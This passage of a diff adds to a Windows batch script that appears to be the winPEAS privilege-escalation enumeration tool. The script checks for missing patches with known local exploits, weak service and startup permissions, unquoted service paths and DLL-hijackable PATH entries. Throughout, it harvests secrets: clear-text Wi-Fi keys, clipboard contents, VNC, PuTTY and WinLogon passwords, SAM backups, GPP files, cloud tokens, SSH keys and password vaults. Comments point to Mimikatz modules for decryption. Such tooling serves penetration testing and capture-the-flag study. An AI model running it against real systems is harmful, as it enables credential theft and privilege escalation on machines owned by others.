(Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! 
(Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) +ECHO. +CALL :T_Progress 2 + +:DateAndTime +CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME" +ECHO. [i] You may need to adjust your local date/time to exploit some vulnerability +date /T +time /T +ECHO. +CALL :T_Progress 2 + +:AuditSettings +CALL :ColorLine " %E%33m[+]%E%97m Audit Settings" +ECHO. [i] Check what is being logged +REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul +ECHO. +CALL :T_Progress 1 + +:WEFSettings +CALL :ColorLine " %E%33m[+]%E%97m WEF Settings" +ECHO. 
[i] Check where are being sent the logs +REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul +ECHO. +CALL :T_Progress 1 + +:LAPSInstallCheck +CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?" +ECHO. [i] Check what is being logged +REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul +ECHO. +CALL :T_Progress 1 + +:LSAProtectionCheck +CALL :ColorLine " %E%33m[+]%E%97m LSA protection?" +ECHO. [i] Active if "1" +REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul +CALL :T_Progress 1 + +:LSACredentialGuard +CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?" +ECHO. [i] Active if "1" or "2" +REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul +ECHO. +CALL :T_Progress 1 + +:LogonCredentialsPlainInMemory +CALL :ColorLine " %E%33m[+]%E%97m WDigest?" +ECHO. [i] Plain-text creds in memory if "1" +reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul +ECHO. +CALL :T_Progress 1 + +:CachedCreds +CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds" +ECHO. [i] You need System-rights to extract them +reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul +CALL :T_Progress 1 + +:UACSettings +CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" +ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access +REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul +ECHO. 
+CALL :T_Progress 1 + +:AVSettings +CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" +WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more +ECHO.Checking for defender whitelisted PATHS +reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul +CALL :T_Progress 1 + +:PSSettings +CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings" +ECHO.PowerShell v2 Version: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul +ECHO.PowerShell v5 Version: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul +ECHO.Transcriptions Settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul +ECHO.Module logging settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul +ECHO.Scriptblog logging settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul +ECHO. +ECHO.PS default transcript history +dir %SystemDrive%\transcripts\ 2>nul +ECHO. +ECHO.Checking PS history file +dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul +ECHO. +CALL :T_Progress 3 + +:MountedDisks +CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" +ECHO. [i] Maybe you find something interesting +(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) +ECHO. +CALL :T_Progress 1 + +:Environment +CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT" +ECHO. [i] Interesting information? +ECHO. +set +ECHO. +CALL :T_Progress 1 + +:InstalledSoftware +CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" +ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software +ECHO. 
+dir /b "C:\Program Files" "C:\Program Files (x86)" | sort +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" +reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" +IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) +ECHO. +CALL :T_Progress 2 + +:RemodeDeskCredMgr +CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager +IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files +ECHO. +CALL :T_Progress 1 + +:WSUS +CALL :ColorLine " %E%33m[+]%E%97m WSUS" +ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus +reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" +ECHO. +CALL :T_Progress 1 + +:RunningProcesses +CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" +ECHO. [i] Something unexpected is running? Check for vulnerabilities +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes +tasklist /SVC +ECHO. +CALL :T_Progress 2 +ECHO. 
[i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) +for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( + for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do ( + icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. + ) +) +ECHO. +ECHO. [i] Checking directory permissions of running processes (DLL injection) +for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do ( + icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. +) +ECHO. +CALL :T_Progress 3 + +:RunAtStartup +CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" +ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup +::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ +CALL :T_Progress 2 +icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. 
& ^ +icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +CALL :T_Progress 2 +icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +CALL :T_Progress 2 +schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") +ECHO. +CALL :T_Progress 2 + +:AlwaysInstallElevated +CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" +ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul +ECHO. +CALL :T_Progress 2 + +:NetworkShares +CALL :ColorLine "%E%32m[*]%E%97m NETWORK" +CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES" +net share +ECHO. +CALL :T_Progress 1 + +:NetworkInterfaces +CALL :ColorLine " %E%33m[+]%E%97m INTERFACES" +ipconfig /all +ECHO. 
+CALL :T_Progress 1 + +:NetworkUsedPorts +CALL :ColorLine " %E%33m[+]%E%97m USED PORTS" +ECHO. [i] Check for services restricted from the outside +netstat -ano | findstr /i listen +ECHO. +CALL :T_Progress 1 + +:NetworkFirewall +CALL :ColorLine " %E%33m[+]%E%97m FIREWALL" +netsh firewall show state +netsh firewall show config +ECHO. +CALL :T_Progress 2 + +:ARP +CALL :ColorLine " %E%33m[+]%E%97m ARP" +arp -A +ECHO. +CALL :T_Progress 1 + +:NetworkRoutes +CALL :ColorLine " %E%33m[+]%E%97m ROUTES" +route print +ECHO. +CALL :T_Progress 1 + +:WindowsHostsFile +CALL :ColorLine " %E%33m[+]%E%97m Hosts file" +type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" +CALL :T_Progress 1 + +:DNSCache +CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE" +ipconfig /displaydns | findstr "Record" | findstr "Name Host" +ECHO. +CALL :T_Progress 1 + +:WifiCreds +CALL :ColorLine " %E%33m[+]%E%97m WIFI" +for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) +CALL :T_Progress 1 + +:BasicUserInfo +CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO +ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups +ECHO. +CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" +net user %username% +net user %USERNAME% /domain 2>nul +whoami /all +ECHO. +CALL :T_Progress 2 + +:BasicUserInfoUsers +CALL :ColorLine " %E%33m[+]%E%97m USERS" +net user +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoGroups +CALL :ColorLine " %E%33m[+]%E%97m GROUPS" +net localgroup +ECHO. 
+CALL :T_Progress 1 + +:BasicUserInfoAdminGroups +CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS" +REM seems to be localised +net localgroup Administrators 2>nul +net localgroup Administradores 2>nul +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoLoggedUser +CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS" +quser +ECHO. +CALL :T_Progress 1 + +:KerberosTickets +CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets" +klist +ECHO. +CALL :T_Progress 1 + +:CurrentClipboard +CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD" +ECHO. [i] Any password inside the clipboard? +powershell -command "Get-Clipboard" 2>nul +ECHO. +CALL :T_Progress 1 + +:ServiceVulnerabilities +CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES" +:::sysinternals external tool +::ECHO. +::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER" +::ECHO. [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service +::ECHO. [i] If accesschk.exe is not in PATH, nothing will be found here +::ECHO. [i] AUTHETICATED USERS +::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul +::ECHO. [i] EVERYONE +::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul +::ECHO. [i] BUILTIN\Users +::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul +::ECHO. [i] TODOS +::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul +::ECHO. [i] %USERNAME% +::accesschk.exe -uwcqv %username% * /accepteula 2>nul +::ECHO. +::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *" +::ECHO. [i] Check for weird service permissions for unexpected groups" +::accesschk.exe -uwcqv * /accepteula 2>nul +CALL :T_Progress 1 +ECHO. 
+ +:ServiceBinaryPermissions +CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( + for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. +) +ECHO. +CALL :T_Progress 1 + +:CheckRegistryModificationAbilities +CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a +ECHO. +CALL :T_Progress 1 + +:UnquotedServicePaths +CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" +ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' +ECHO. [i] The permissions are also checked and filtered using icacls +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( + for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( + ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. 
+ ) +) +CALL :T_Progress 2 +::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ +ECHO. +::CALL :T_Progress 1 + +:PATHenvHijacking +CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" +ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations +ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking +for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) +ECHO. +CALL :T_Progress 1 + +:WindowsCredentials +CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" +ECHO. +CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault +cmdkey /list +ECHO. +CALL :T_Progress 2 + +:DPAPIMasterKeys +CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" +ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul +powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul +CALL :T_Progress 2 +CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" +ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt +ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +ECHO. +ECHO.Looking inside %appdata%\Microsoft\Credentials\ +ECHO. +dir /b/a %appdata%\Microsoft\Credentials\ 2>nul +CALL :T_Progress 2 +ECHO. 
+ECHO.Looking inside %localappdata%\Microsoft\Credentials\ +ECHO. +dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul +CALL :T_Progress 2 +ECHO. + +:UnattendedFiles +CALL :ColorLine " %E%33m[+]%E%97m Unattended files" +IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists. +IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists. +IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists. +IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists. +IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists. +IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists. +IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists. +IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists. +IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists. +IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists. +IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists. +ECHO. +CALL :T_Progress 2 + +:SAMSYSBackups +CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups" +IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists. +IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists. +IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists. +IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists. +IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists. +IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists. +ECHO. 
+CALL :T_Progress 3
+
+:McAffeeSitelist
+CALL :ColorLine " %E%33m[+]%E%97m McAffee SiteList.xml"
+cd %ProgramFiles% 2>nul
+dir /s SiteList.xml 2>nul
+cd %ProgramFiles(x86)% 2>nul
+dir /s SiteList.xml 2>nul
+cd "%windir%\..\Documents and Settings" 2>nul
+dir /s SiteList.xml 2>nul
+cd %windir%\..\Users 2>nul
+dir /s SiteList.xml 2>nul
+ECHO.
+CALL :T_Progress 2
+
+:GPPPassword
+CALL :ColorLine " %E%33m[+]%E%97m GPP Password"
+cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul
+dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul
+cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul
+dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul
+ECHO.
+CALL :T_Progress 2
+
+:CloudCreds
+CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials"
+cd "%SystemDrive%\Users"
+dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul
+cd "%windir%\..\Documents and Settings"
+dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul
+ECHO.
+CALL :T_Progress 2
+
+:AppCMD
+CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
+ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
+IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
+ECHO.
+CALL :T_Progress 2
+
+:RegFilesCredentials
+CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials"
+ECHO. [i] Searching specific files that may contains credentials.
+ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
+ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password
+reg query HKCU\Software\ORL\WinVNC3\Password 2>nul
+CALL :T_Progress 2
+ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
+reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul
+CALL :T_Progress 2
+ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
+CALL :T_Progress 2
+ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
+reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul
+CALL :T_Progress 2
+ECHO.Looking inside HKCU\Software\TightVNC\Server
+reg query HKCU\Software\TightVNC\Server 2>nul
+CALL :T_Progress 2
+ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
+reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul
+CALL :T_Progress 2
+ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys
+CALL :T_Progress 2
+reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul
+cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul
+cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..
+dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == 